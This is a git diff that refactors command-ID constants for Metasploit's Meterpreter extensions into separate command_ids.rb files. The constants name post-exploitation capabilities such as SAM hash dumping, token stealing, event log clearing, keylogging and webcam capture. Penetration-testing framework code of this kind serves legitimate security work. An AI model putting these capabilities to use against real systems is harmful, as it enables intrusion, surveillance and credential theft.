index 117d079132b99..f46604363f313 100644
--- a/lib/rex/post/meterpreter/extensions/peinjector/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/peinjector/tlv.rb
@@ -5,12 +5,6 @@ module Meterpreter
 module Extensions
 module Peinjector
 
-# ID for the extension (needs to be a multiple of 1000)
-EXTENSION_ID_PEINJECTOR = 16000
-
-# Associated command ids
-COMMAND_ID_PEINJECTOR_INJECT_SHELLCODE = EXTENSION_ID_PEINJECTOR + 1
-
 TLV_TYPE_PEINJECTOR_SHELLCODE         = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 1)
 TLV_TYPE_PEINJECTOR_SHELLCODE_SIZE    = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 2)
 TLV_TYPE_PEINJECTOR_SHELLCODE_ISX64   = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 3)
diff --git a/lib/rex/post/meterpreter/extensions/powershell/command_ids.rb b/lib/rex/post/meterpreter/extensions/powershell/command_ids.rb
new file mode 100644
index 0000000000000..1e5a21bca84e0
--- /dev/null
+++ b/lib/rex/post/meterpreter/extensions/powershell/command_ids.rb
@@ -0,0 +1,21 @@
+# -*- coding: binary -*-
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Powershell
+
+# ID for the extension (needs to be a multiple of 1000)
+EXTENSION_ID_POWERSHELL = 14000
+
+# Associated command ids
+COMMAND_ID_POWERSHELL_ASSEMBLY_LOAD  = EXTENSION_ID_POWERSHELL + 1
+COMMAND_ID_POWERSHELL_EXECUTE        = EXTENSION_ID_POWERSHELL + 2
+COMMAND_ID_POWERSHELL_SESSION_REMOVE = EXTENSION_ID_POWERSHELL + 3
+COMMAND_ID_POWERSHELL_SHELL          = EXTENSION_ID_POWERSHELL + 4
+
+end
+end
+end
+end
+end
diff --git a/lib/rex/post/meterpreter/extensions/powershell/powershell.rb b/lib/rex/post/meterpreter/extensions/powershell/powershell.rb
index adeb44f09184a..b62a8b5f82425 100644
--- a/lib/rex/post/meterpreter/extensions/powershell/powershell.rb
+++ b/lib/rex/post/meterpreter/extensions/powershell/powershell.rb
@@ -1,6 +1,7 @@
 # -*- coding: binary -*-
 
 require 'rex/post/meterpreter/extensions/powershell/tlv'
+require 'rex/post/meterpreter/extensions/powershell/command_ids'
 
 module Rex
 module Post
diff --git a/lib/rex/post/meterpreter/extensions/powershell/tlv.rb b/lib/rex/post/meterpreter/extensions/powershell/tlv.rb
index eb6e670351f67..edb69d3c68ac6 100644
--- a/lib/rex/post/meterpreter/extensions/powershell/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/powershell/tlv.rb
@@ -5,15 +5,6 @@ module Meterpreter
 module Extensions
 module Powershell
 
-# ID for the extension (needs to be a multiple of 1000)
-EXTENSION_ID_POWERSHELL = 14000
-
-# Associated command ids
-COMMAND_ID_POWERSHELL_ASSEMBLY_LOAD  = EXTENSION_ID_POWERSHELL + 1
-COMMAND_ID_POWERSHELL_EXECUTE        = EXTENSION_ID_POWERSHELL + 2
-COMMAND_ID_POWERSHELL_SESSION_REMOVE = EXTENSION_ID_POWERSHELL + 3
-COMMAND_ID_POWERSHELL_SHELL          = EXTENSION_ID_POWERSHELL + 4
-
 TLV_TYPE_POWERSHELL_SESSIONID        = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 1)
 TLV_TYPE_POWERSHELL_CODE             = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 2)
 TLV_TYPE_POWERSHELL_RESULT           = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 3)
diff --git a/lib/rex/post/meterpreter/extensions/priv/command_ids.rb b/lib/rex/post/meterpreter/extensions/priv/command_ids.rb
new file mode 100644
index 0000000000000..1b4d89fb1ff81
--- /dev/null
+++ b/lib/rex/post/meterpreter/extensions/priv/command_ids.rb
@@ -0,0 +1,24 @@
+# -*- coding: binary -*-
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Priv
+
+# ID for the extension (needs to be a multiple of 1000)
+EXTENSION_ID_PRIV = 2000
+
+# Associated command ids
+COMMAND_ID_PRIV_ELEVATE_GETSYSTEM          = EXTENSION_ID_PRIV + 1
+COMMAND_ID_PRIV_FS_BLANK_DIRECTORY_MACE    = EXTENSION_ID_PRIV + 2
+COMMAND_ID_PRIV_FS_BLANK_FILE_MACE         = EXTENSION_ID_PRIV + 3
+COMMAND_ID_PRIV_FS_GET_FILE_MACE           = EXTENSION_ID_PRIV + 4
+COMMAND_ID_PRIV_FS_SET_FILE_MACE           = EXTENSION_ID_PRIV + 5
+COMMAND_ID_PRIV_FS_SET_FILE_MACE_FROM_FILE = EXTENSION_ID_PRIV + 6
+COMMAND_ID_PRIV_PASSWD_GET_SAM_HASHES      = EXTENSION_ID_PRIV + 7
+
+end
+end
+end
+end
+end
diff --git a/lib/rex/post/meterpreter/extensions/priv/priv.rb b/lib/rex/post/meterpreter/extensions/priv/priv.rb
index 78e07f0923d7d..296c6c73ae23d 100644
--- a/lib/rex/post/meterpreter/extensions/priv/priv.rb
+++ b/lib/rex/post/meterpreter/extensions/priv/priv.rb
@@ -1,6 +1,7 @@
 # -*- coding: binary -*-
 
 require 'rex/post/meterpreter/extensions/priv/tlv'
+require 'rex/post/meterpreter/extensions/priv/command_ids'
 require 'rex/post/meterpreter/extensions/priv/passwd'
 require 'rex/post/meterpreter/extensions/priv/fs'
 
diff --git a/lib/rex/post/meterpreter/extensions/priv/tlv.rb b/lib/rex/post/meterpreter/extensions/priv/tlv.rb
index a19ffdef3c978..92cf1b7f4ad43 100644
--- a/lib/rex/post/meterpreter/extensions/priv/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/priv/tlv.rb
@@ -5,18 +5,6 @@ module Meterpreter
 module Extensions
 module Priv
 
-# ID for the extension (needs to be a multiple of 1000)
-EXTENSION_ID_PRIV = 2000
-
-# Associated command ids
-COMMAND_ID_PRIV_ELEVATE_GETSYSTEM          = EXTENSION_ID_PRIV + 1
-COMMAND_ID_PRIV_FS_BLANK_DIRECTORY_MACE    = EXTENSION_ID_PRIV + 2
-COMMAND_ID_PRIV_FS_BLANK_FILE_MACE         = EXTENSION_ID_PRIV + 3
-COMMAND_ID_PRIV_FS_GET_FILE_MACE           = EXTENSION_ID_PRIV + 4
-COMMAND_ID_PRIV_FS_SET_FILE_MACE           = EXTENSION_ID_PRIV + 5
-COMMAND_ID_PRIV_FS_SET_FILE_MACE_FROM_FILE = EXTENSION_ID_PRIV + 6
-COMMAND_ID_PRIV_PASSWD_GET_SAM_HASHES      = EXTENSION_ID_PRIV + 7
-
 # Passwd
 TLV_TYPE_SAM_HASHES                 = TLV_META_TYPE_STRING | (TLV_EXTENSIONS +   1)
 
diff --git a/lib/rex/post/meterpreter/extensions/python/command_ids.rb b/lib/rex/post/meterpreter/extensions/python/command_ids.rb
new file mode 100644
index 0000000000000..cea23bac9cc25
--- /dev/null
+++ b/lib/rex/post/meterpreter/extensions/python/command_ids.rb
@@ -0,0 +1,19 @@
+# -*- coding: binary -*-
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Python
+
+# ID for the extension (needs to be a multiple of 1000)
+EXTENSION_ID_PYTHON = 13000
+
+# Associated command ids
+COMMAND_ID_PYTHON_EXECUTE = EXTENSION_ID_PYTHON + 1
+COMMAND_ID_PYTHON_RESET   = EXTENSION_ID_PYTHON + 2
+
+end
+end
+end
+end
+end
diff --git a/lib/rex/post/meterpreter/extensions/python/python.rb b/lib/rex/post/meterpreter/extensions/python/python.rb
index 36cb69465635b..0d35afd91d1ab 100644
--- a/lib/rex/post/meterpreter/extensions/python/python.rb
+++ b/lib/rex/post/meterpreter/extensions/python/python.rb
@@ -1,6 +1,7 @@
 # -*- coding: binary -*-
 
 require 'rex/post/meterpreter/extensions/python/tlv'
+require 'rex/post/meterpreter/extensions/python/command_ids'
 require 'set'
 
 module Rex
diff --git a/lib/rex/post/meterpreter/extensions/python/tlv.rb b/lib/rex/post/meterpreter/extensions/python/tlv.rb
index 181dd9ebfaa8a..318593a6b8cca 100644
--- a/lib/rex/post/meterpreter/extensions/python/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/python/tlv.rb
@@ -5,14 +5,6 @@ module Meterpreter
 module Extensions
 module Python
 
-# ID for the extension (needs to be a multiple of 1000)
-EXTENSION_ID_PYTHON = 13000
-
-# Associated command ids
-COMMAND_ID_PYTHON_EXECUTE = EXTENSION_ID_PYTHON + 1
-COMMAND_ID_PYTHON_RESET   = EXTENSION_ID_PYTHON + 2
-
-
 TLV_TYPE_PYTHON_STDOUT             = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 1)
 TLV_TYPE_PYTHON_STDERR             = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 2)
 TLV_TYPE_PYTHON_CODE               = TLV_META_TYPE_RAW    | (TLV_EXTENSIONS + 3)
diff --git a/lib/rex/post/meterpreter/extensions/sniffer/command_ids.rb b/lib/rex/post/meterpreter/extensions/sniffer/command_ids.rb
new file mode 100644
index 0000000000000..d2d5b7a55bfea
--- /dev/null
+++ b/lib/rex/post/meterpreter/extensions/sniffer/command_ids.rb
@@ -0,0 +1,24 @@
+# -*- coding: binary -*-
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Sniffer
+
+# ID for the extension (needs to be a multiple of 1000)
+EXTENSION_ID_SNIFFER = 4000
+
+# Associated command ids
+COMMAND_ID_SNIFFER_CAPTURE_DUMP      = EXTENSION_ID_SNIFFER + 1
+COMMAND_ID_SNIFFER_CAPTURE_DUMP_READ = EXTENSION_ID_SNIFFER + 2
+COMMAND_ID_SNIFFER_CAPTURE_RELEASE   = EXTENSION_ID_SNIFFER + 3
+COMMAND_ID_SNIFFER_CAPTURE_START     = EXTENSION_ID_SNIFFER + 4
+COMMAND_ID_SNIFFER_CAPTURE_STATS     = EXTENSION_ID_SNIFFER + 5
+COMMAND_ID_SNIFFER_CAPTURE_STOP      = EXTENSION_ID_SNIFFER + 6
+COMMAND_ID_SNIFFER_INTERFACES        = EXTENSION_ID_SNIFFER + 7
+
+end
+end
+end
+end
+end
diff --git a/lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb b/lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb
index 3b7870d611105..5aeb8b62d5b0e 100644
--- a/lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb
+++ b/lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb
@@ -1,6 +1,7 @@
 # -*- coding: binary -*-
 
 require 'rex/post/meterpreter/extensions/sniffer/tlv'
+require 'rex/post/meterpreter/extensions/sniffer/command_ids'
 require 'rex/proto/smb/utils'
 
 module Rex
diff --git a/lib/rex/post/meterpreter/extensions/sniffer/tlv.rb b/lib/rex/post/meterpreter/extensions/sniffer/tlv.rb
index fbb4af3c68c53..ace6485cff207 100644
--- a/lib/rex/post/meterpreter/extensions/sniffer/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/sniffer/tlv.rb
@@ -5,18 +5,6 @@ module Meterpreter
 module Extensions
 module Sniffer
 
-# ID for the extension (needs to be a multiple of 1000)
-EXTENSION_ID_SNIFFER = 4000
-
-# Associated command ids
-COMMAND_ID_SNIFFER_CAPTURE_DUMP      = EXTENSION_ID_SNIFFER + 1
-COMMAND_ID_SNIFFER_CAPTURE_DUMP_READ = EXTENSION_ID_SNIFFER + 2
-COMMAND_ID_SNIFFER_CAPTURE_RELEASE   = EXTENSION_ID_SNIFFER + 3
-COMMAND_ID_SNIFFER_CAPTURE_START     = EXTENSION_ID_SNIFFER + 4
-COMMAND_ID_SNIFFER_CAPTURE_STATS     = EXTENSION_ID_SNIFFER + 5
-COMMAND_ID_SNIFFER_CAPTURE_STOP      = EXTENSION_ID_SNIFFER + 6
-COMMAND_ID_SNIFFER_INTERFACES        = EXTENSION_ID_SNIFFER + 7
-
 TLV_TYPE_EXTENSION_SNIFFER		= 0
 
 TLV_TYPE_SNIFFER_INTERFACES		= TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_SNIFFER + TLV_EXTENSIONS + 1)
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/command_ids.rb b/lib/rex/post/meterpreter/extensions/stdapi/command_ids.rb
new file mode 100644
index 0000000000000..6d4f21641f3b4
--- /dev/null
+++ b/lib/rex/post/meterpreter/extensions/stdapi/command_ids.rb
@@ -0,0 +1,132 @@
+# -*- coding: binary -*-
+
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Stdapi
+
+# ID for the extension (needs to be a multiple of 1000)
+EXTENSION_ID_STDAPI = 1000
+
+# Associated command ids
+COMMAND_ID_STDAPI_FS_CHDIR                           = EXTENSION_ID_STDAPI + 1
+COMMAND_ID_STDAPI_FS_CHMOD                           = EXTENSION_ID_STDAPI + 2
+COMMAND_ID_STDAPI_FS_DELETE_DIR                      = EXTENSION_ID_STDAPI + 3
+COMMAND_ID_STDAPI_FS_DELETE_FILE                     = EXTENSION_ID_STDAPI + 4
+COMMAND_ID_STDAPI_FS_FILE_COPY                       = EXTENSION_ID_STDAPI + 5
+COMMAND_ID_STDAPI_FS_FILE_EXPAND_PATH                = EXTENSION_ID_STDAPI + 6
+COMMAND_ID_STDAPI_FS_FILE_MOVE                       = EXTENSION_ID_STDAPI + 7
+COMMAND_ID_STDAPI_FS_GETWD                           = EXTENSION_ID_STDAPI + 8
+COMMAND_ID_STDAPI_FS_LS                              = EXTENSION_ID_STDAPI + 9
+COMMAND_ID_STDAPI_FS_MD5                             = EXTENSION_ID_STDAPI + 10
+COMMAND_ID_STDAPI_FS_MKDIR                           = EXTENSION_ID_STDAPI + 11
+COMMAND_ID_STDAPI_FS_MOUNT_SHOW                      = EXTENSION_ID_STDAPI + 12
+COMMAND_ID_STDAPI_FS_SEARCH                          = EXTENSION_ID_STDAPI + 13
+COMMAND_ID_STDAPI_FS_SEPARATOR                       = EXTENSION_ID_STDAPI + 14
+COMMAND_ID_STDAPI_FS_SHA1                            = EXTENSION_ID_STDAPI + 15
+COMMAND_ID_STDAPI_FS_STAT                            = EXTENSION_ID_STDAPI + 16
+COMMAND_ID_STDAPI_NET_CONFIG_ADD_ROUTE               = EXTENSION_ID_STDAPI + 17
+COMMAND_ID_STDAPI_NET_CONFIG_GET_ARP_TABLE           = EXTENSION_ID_STDAPI + 18
+COMMAND_ID_STDAPI_NET_CONFIG_GET_INTERFACES          = EXTENSION_ID_STDAPI + 19
+COMMAND_ID_STDAPI_NET_CONFIG_GET_NETSTAT             = EXTENSION_ID_STDAPI + 20
+COMMAND_ID_STDAPI_NET_CONFIG_GET_PROXY               = EXTENSION_ID_STDAPI + 21
+COMMAND_ID_STDAPI_NET_CONFIG_GET_ROUTES              = EXTENSION_ID_STDAPI + 22
+COMMAND_ID_STDAPI_NET_CONFIG_REMOVE_ROUTE            = EXTENSION_ID_STDAPI + 23
+COMMAND_ID_STDAPI_NET_RESOLVE_HOST                   = EXTENSION_ID_STDAPI + 24
+COMMAND_ID_STDAPI_NET_RESOLVE_HOSTS                  = EXTENSION_ID_STDAPI + 25
+COMMAND_ID_STDAPI_NET_SOCKET_TCP_SHUTDOWN            = EXTENSION_ID_STDAPI + 26
+COMMAND_ID_STDAPI_NET_TCP_CHANNEL_OPEN               = EXTENSION_ID_STDAPI + 27
+COMMAND_ID_STDAPI_RAILGUN_API                        = EXTENSION_ID_STDAPI + 28
+COMMAND_ID_STDAPI_RAILGUN_API_MULTI                  = EXTENSION_ID_STDAPI + 29
+COMMAND_ID_STDAPI_RAILGUN_MEMREAD                    = EXTENSION_ID_STDAPI + 30
+COMMAND_ID_STDAPI_RAILGUN_MEMWRITE                   = EXTENSION_ID_STDAPI + 31
+COMMAND_ID_STDAPI_REGISTRY_CHECK_KEY_EXISTS          = EXTENSION_ID_STDAPI + 32
+COMMAND_ID_STDAPI_REGISTRY_CLOSE_KEY                 = EXTENSION_ID_STDAPI + 33
+COMMAND_ID_STDAPI_REGISTRY_CREATE_KEY                = EXTENSION_ID_STDAPI + 34
+COMMAND_ID_STDAPI_REGISTRY_DELETE_KEY                = EXTENSION_ID_STDAPI + 35
+COMMAND_ID_STDAPI_REGISTRY_DELETE_VALUE              = EXTENSION_ID_STDAPI + 36
+COMMAND_ID_STDAPI_REGISTRY_ENUM_KEY                  = EXTENSION_ID_STDAPI + 37
+COMMAND_ID_STDAPI_REGISTRY_ENUM_KEY_DIRECT           = EXTENSION_ID_STDAPI + 38
+COMMAND_ID_STDAPI_REGISTRY_ENUM_VALUE                = EXTENSION_ID_STDAPI + 39
+COMMAND_ID_STDAPI_REGISTRY_ENUM_VALUE_DIRECT         = EXTENSION_ID_STDAPI + 40
+COMMAND_ID_STDAPI_REGISTRY_LOAD_KEY                  = EXTENSION_ID_STDAPI + 41
+COMMAND_ID_STDAPI_REGISTRY_OPEN_KEY                  = EXTENSION_ID_STDAPI + 42
+COMMAND_ID_STDAPI_REGISTRY_OPEN_REMOTE_KEY           = EXTENSION_ID_STDAPI + 43
+COMMAND_ID_STDAPI_REGISTRY_QUERY_CLASS               = EXTENSION_ID_STDAPI + 44
+COMMAND_ID_STDAPI_REGISTRY_QUERY_VALUE               = EXTENSION_ID_STDAPI + 45
+COMMAND_ID_STDAPI_REGISTRY_QUERY_VALUE_DIRECT        = EXTENSION_ID_STDAPI + 46
+COMMAND_ID_STDAPI_REGISTRY_SET_VALUE                 = EXTENSION_ID_STDAPI + 47
+COMMAND_ID_STDAPI_REGISTRY_SET_VALUE_DIRECT          = EXTENSION_ID_STDAPI + 48
+COMMAND_ID_STDAPI_REGISTRY_UNLOAD_KEY                = EXTENSION_ID_STDAPI + 49
+COMMAND_ID_STDAPI_SYS_CONFIG_DRIVER_LIST             = EXTENSION_ID_STDAPI + 50
+COMMAND_ID_STDAPI_SYS_CONFIG_DROP_TOKEN              = EXTENSION_ID_STDAPI + 51
+COMMAND_ID_STDAPI_SYS_CONFIG_GETENV                  = EXTENSION_ID_STDAPI + 52
+COMMAND_ID_STDAPI_SYS_CONFIG_GETPRIVS                = EXTENSION_ID_STDAPI + 53
+COMMAND_ID_STDAPI_SYS_CONFIG_GETSID                  = EXTENSION_ID_STDAPI + 54
+COMMAND_ID_STDAPI_SYS_CONFIG_GETUID                  = EXTENSION_ID_STDAPI + 55
+COMMAND_ID_STDAPI_SYS_CONFIG_LOCALTIME               = EXTENSION_ID_STDAPI + 56
+COMMAND_ID_STDAPI_SYS_CONFIG_REV2SELF                = EXTENSION_ID_STDAPI + 57
+COMMAND_ID_STDAPI_SYS_CONFIG_STEAL_TOKEN             = EXTENSION_ID_STDAPI + 58
+COMMAND_ID_STDAPI_SYS_CONFIG_SYSINFO                 = EXTENSION_ID_STDAPI + 59
+COMMAND_ID_STDAPI_SYS_EVENTLOG_CLEAR                 = EXTENSION_ID_STDAPI + 60
+COMMAND_ID_STDAPI_SYS_EVENTLOG_CLOSE                 = EXTENSION_ID_STDAPI + 61
+COMMAND_ID_STDAPI_SYS_EVENTLOG_NUMRECORDS            = EXTENSION_ID_STDAPI + 62
+COMMAND_ID_STDAPI_SYS_EVENTLOG_OLDEST                = EXTENSION_ID_STDAPI + 63
+COMMAND_ID_STDAPI_SYS_EVENTLOG_OPEN                  = EXTENSION_ID_STDAPI + 64
+COMMAND_ID_STDAPI_SYS_EVENTLOG_READ                  = EXTENSION_ID_STDAPI + 65
+COMMAND_ID_STDAPI_SYS_POWER_EXITWINDOWS              = EXTENSION_ID_STDAPI + 66
+COMMAND_ID_STDAPI_SYS_PROCESS_ATTACH                 = EXTENSION_ID_STDAPI + 67
+COMMAND_ID_STDAPI_SYS_PROCESS_CLOSE                  = EXTENSION_ID_STDAPI + 68
+COMMAND_ID_STDAPI_SYS_PROCESS_EXECUTE                = EXTENSION_ID_STDAPI + 69
+COMMAND_ID_STDAPI_SYS_PROCESS_GET_INFO               = EXTENSION_ID_STDAPI + 70
+COMMAND_ID_STDAPI_SYS_PROCESS_GET_PROCESSES          = EXTENSION_ID_STDAPI + 71
+COMMAND_ID_STDAPI_SYS_PROCESS_GETPID                 = EXTENSION_ID_STDAPI + 72
+COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_GET_IMAGES       = EXTENSION_ID_STDAPI + 73
+COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_GET_PROC_ADDRESS = EXTENSION_ID_STDAPI + 74
+COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_LOAD             = EXTENSION_ID_STDAPI + 75
+COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_UNLOAD           = EXTENSION_ID_STDAPI + 76
+COMMAND_ID_STDAPI_SYS_PROCESS_KILL                   = EXTENSION_ID_STDAPI + 77
+COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_ALLOCATE        = EXTENSION_ID_STDAPI + 78
+COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_FREE            = EXTENSION_ID_STDAPI + 79
+COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_LOCK            = EXTENSION_ID_STDAPI + 80
+COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_PROTECT         = EXTENSION_ID_STDAPI + 81
+COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_QUERY           = EXTENSION_ID_STDAPI + 82
+COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_READ            = EXTENSION_ID_STDAPI + 83
+COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_UNLOCK          = EXTENSION_ID_STDAPI + 84
+COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_WRITE           = EXTENSION_ID_STDAPI + 85
+COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_CLOSE           = EXTENSION_ID_STDAPI + 86
+COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_CREATE          = EXTENSION_ID_STDAPI + 87
+COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_GET_THREADS     = EXTENSION_ID_STDAPI + 88
+COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_OPEN            = EXTENSION_ID_STDAPI + 89
+COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_QUERY_REGS      = EXTENSION_ID_STDAPI + 90
+COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_RESUME          = EXTENSION_ID_STDAPI + 91
+COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_SET_REGS        = EXTENSION_ID_STDAPI + 92
+COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_SUSPEND         = EXTENSION_ID_STDAPI + 93
+COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_TERMINATE       = EXTENSION_ID_STDAPI + 94
+COMMAND_ID_STDAPI_SYS_PROCESS_WAIT                   = EXTENSION_ID_STDAPI + 95
+COMMAND_ID_STDAPI_UI_DESKTOP_ENUM                    = EXTENSION_ID_STDAPI + 96
+COMMAND_ID_STDAPI_UI_DESKTOP_GET                     = EXTENSION_ID_STDAPI + 97
+COMMAND_ID_STDAPI_UI_DESKTOP_SCREENSHOT              = EXTENSION_ID_STDAPI + 98
+COMMAND_ID_STDAPI_UI_DESKTOP_SET                     = EXTENSION_ID_STDAPI + 99
+COMMAND_ID_STDAPI_UI_ENABLE_KEYBOARD                 = EXTENSION_ID_STDAPI + 100
+COMMAND_ID_STDAPI_UI_ENABLE_MOUSE                    = EXTENSION_ID_STDAPI + 101
+COMMAND_ID_STDAPI_UI_GET_IDLE_TIME                   = EXTENSION_ID_STDAPI + 102
+COMMAND_ID_STDAPI_UI_GET_KEYS_UTF8                   = EXTENSION_ID_STDAPI + 103
+COMMAND_ID_STDAPI_UI_SEND_KEYEVENT                   = EXTENSION_ID_STDAPI + 104
+COMMAND_ID_STDAPI_UI_SEND_KEYS                       = EXTENSION_ID_STDAPI + 105
+COMMAND_ID_STDAPI_UI_SEND_MOUSE                      = EXTENSION_ID_STDAPI + 106
+COMMAND_ID_STDAPI_UI_START_KEYSCAN                   = EXTENSION_ID_STDAPI + 107
+COMMAND_ID_STDAPI_UI_STOP_KEYSCAN                    = EXTENSION_ID_STDAPI + 108
+COMMAND_ID_STDAPI_UI_UNLOCK_DESKTOP                  = EXTENSION_ID_STDAPI + 109
+COMMAND_ID_STDAPI_WEBCAM_AUDIO_RECORD                = EXTENSION_ID_STDAPI + 110
+COMMAND_ID_STDAPI_WEBCAM_GET_FRAME                   = EXTENSION_ID_STDAPI + 111
+COMMAND_ID_STDAPI_WEBCAM_LIST                        = EXTENSION_ID_STDAPI + 112
+COMMAND_ID_STDAPI_WEBCAM_START                       = EXTENSION_ID_STDAPI + 113
+COMMAND_ID_STDAPI_WEBCAM_STOP                        = EXTENSION_ID_STDAPI + 114
+COMMAND_ID_STDAPI_AUDIO_MIC_START                    = EXTENSION_ID_STDAPI + 115
+COMMAND_ID_STDAPI_AUDIO_MIC_STOP                     = EXTENSION_ID_STDAPI + 116
+COMMAND_ID_STDAPI_AUDIO_MIC_LIST                     = EXTENSION_ID_STDAPI + 117
+
+end; end; end; end; end
+
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb b/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb
index c176a9f296e0c..af1e73749705e 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb
@@ -4,6 +4,7 @@
 require 'rex/post/meterpreter/extension'
 require 'rex/post/meterpreter/extensions/stdapi/constants'
 require 'rex/post/meterpreter/extensions/stdapi/tlv'
+require 'rex/post/meterpreter/extensions/stdapi/command_ids'
 require 'rex/post/meterpreter/extensions/stdapi/fs/dir'
 require 'rex/post/meterpreter/extensions/stdapi/fs/file'
 require 'rex/post/meterpreter/extensions/stdapi/fs/file_stat'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb b/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb
index 55c61b873beb8..14feacef4b0be 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb
@@ -6,130 +6,6 @@ module Meterpreter
 module Extensions
 module Stdapi
 
-# ID for the extension (needs to be a multiple of 1000)
-EXTENSION_ID_STDAPI = 1000
-
-# Associated command ids
-COMMAND_ID_STDAPI_FS_CHDIR                           = EXTENSION_ID_STDAPI + 1
-COMMAND_ID_STDAPI_FS_CHMOD                           = EXTENSION_ID_STDAPI + 2
-COMMAND_ID_STDAPI_FS_DELETE_DIR                      = EXTENSION_ID_STDAPI + 3
-COMMAND_ID_STDAPI_FS_DELETE_FILE                     = EXTENSION_ID_STDAPI + 4
-COMMAND_ID_STDAPI_FS_FILE_COPY                       = EXTENSION_ID_STDAPI + 5
-COMMAND_ID_STDAPI_FS_FILE_EXPAND_PATH                = EXTENSION_ID_STDAPI + 6
-COMMAND_ID_STDAPI_FS_FILE_MOVE                       = EXTENSION_ID_STDAPI + 7
-COMMAND_ID_STDAPI_FS_GETWD                           = EXTENSION_ID_STDAPI + 8
-COMMAND_ID_STDAPI_FS_LS                              = EXTENSION_ID_STDAPI + 9
-COMMAND_ID_STDAPI_FS_MD5                             = EXTENSION_ID_STDAPI + 10
-COMMAND_ID_STDAPI_FS_MKDIR                           = EXTENSION_ID_STDAPI + 11
-COMMAND_ID_STDAPI_FS_MOUNT_SHOW                      = EXTENSION_ID_STDAPI + 12
-COMMAND_ID_STDAPI_FS_SEARCH                          = EXTENSION_ID_STDAPI + 13
-COMMAND_ID_STDAPI_FS_SEPARATOR                       = EXTENSION_ID_STDAPI + 14
-COMMAND_ID_STDAPI_FS_SHA1                            = EXTENSION_ID_STDAPI + 15
-COMMAND_ID_STDAPI_FS_STAT                            = EXTENSION_ID_STDAPI + 16
-COMMAND_ID_STDAPI_NET_CONFIG_ADD_ROUTE               = EXTENSION_ID_STDAPI + 17
-COMMAND_ID_STDAPI_NET_CONFIG_GET_ARP_TABLE           = EXTENSION_ID_STDAPI + 18
-COMMAND_ID_STDAPI_NET_CONFIG_GET_INTERFACES          = EXTENSION_ID_STDAPI + 19
-COMMAND_ID_STDAPI_NET_CONFIG_GET_NETSTAT             = EXTENSION_ID_STDAPI + 20
-COMMAND_ID_STDAPI_NET_CONFIG_GET_PROXY               = EXTENSION_ID_STDAPI + 21
-COMMAND_ID_STDAPI_NET_CONFIG_GET_ROUTES              = EXTENSION_ID_STDAPI + 22
-COMMAND_ID_STDAPI_NET_CONFIG_REMOVE_ROUTE            = EXTENSION_ID_STDAPI + 23
-COMMAND_ID_STDAPI_NET_RESOLVE_HOST                   = EXTENSION_ID_STDAPI + 24
-COMMAND_ID_STDAPI_NET_RESOLVE_HOSTS                  = EXTENSION_ID_STDAPI + 25
-COMMAND_ID_STDAPI_NET_SOCKET_TCP_SHUTDOWN            = EXTENSION_ID_STDAPI + 26
-COMMAND_ID_STDAPI_NET_TCP_CHANNEL_OPEN               = EXTENSION_ID_STDAPI + 27
-COMMAND_ID_STDAPI_RAILGUN_API                        = EXTENSION_ID_STDAPI + 28
-COMMAND_ID_STDAPI_RAILGUN_API_MULTI                  = EXTENSION_ID_STDAPI + 29
-COMMAND_ID_STDAPI_RAILGUN_MEMREAD                    = EXTENSION_ID_STDAPI + 30
-COMMAND_ID_STDAPI_RAILGUN_MEMWRITE                   = EXTENSION_ID_STDAPI + 31
-COMMAND_ID_STDAPI_REGISTRY_CHECK_KEY_EXISTS          = EXTENSION_ID_STDAPI + 32
-COMMAND_ID_STDAPI_REGISTRY_CLOSE_KEY                 = EXTENSION_ID_STDAPI + 33
-COMMAND_ID_STDAPI_REGISTRY_CREATE_KEY                = EXTENSION_ID_STDAPI + 34
-COMMAND_ID_STDAPI_REGISTRY_DELETE_KEY                = EXTENSION_ID_STDAPI + 35
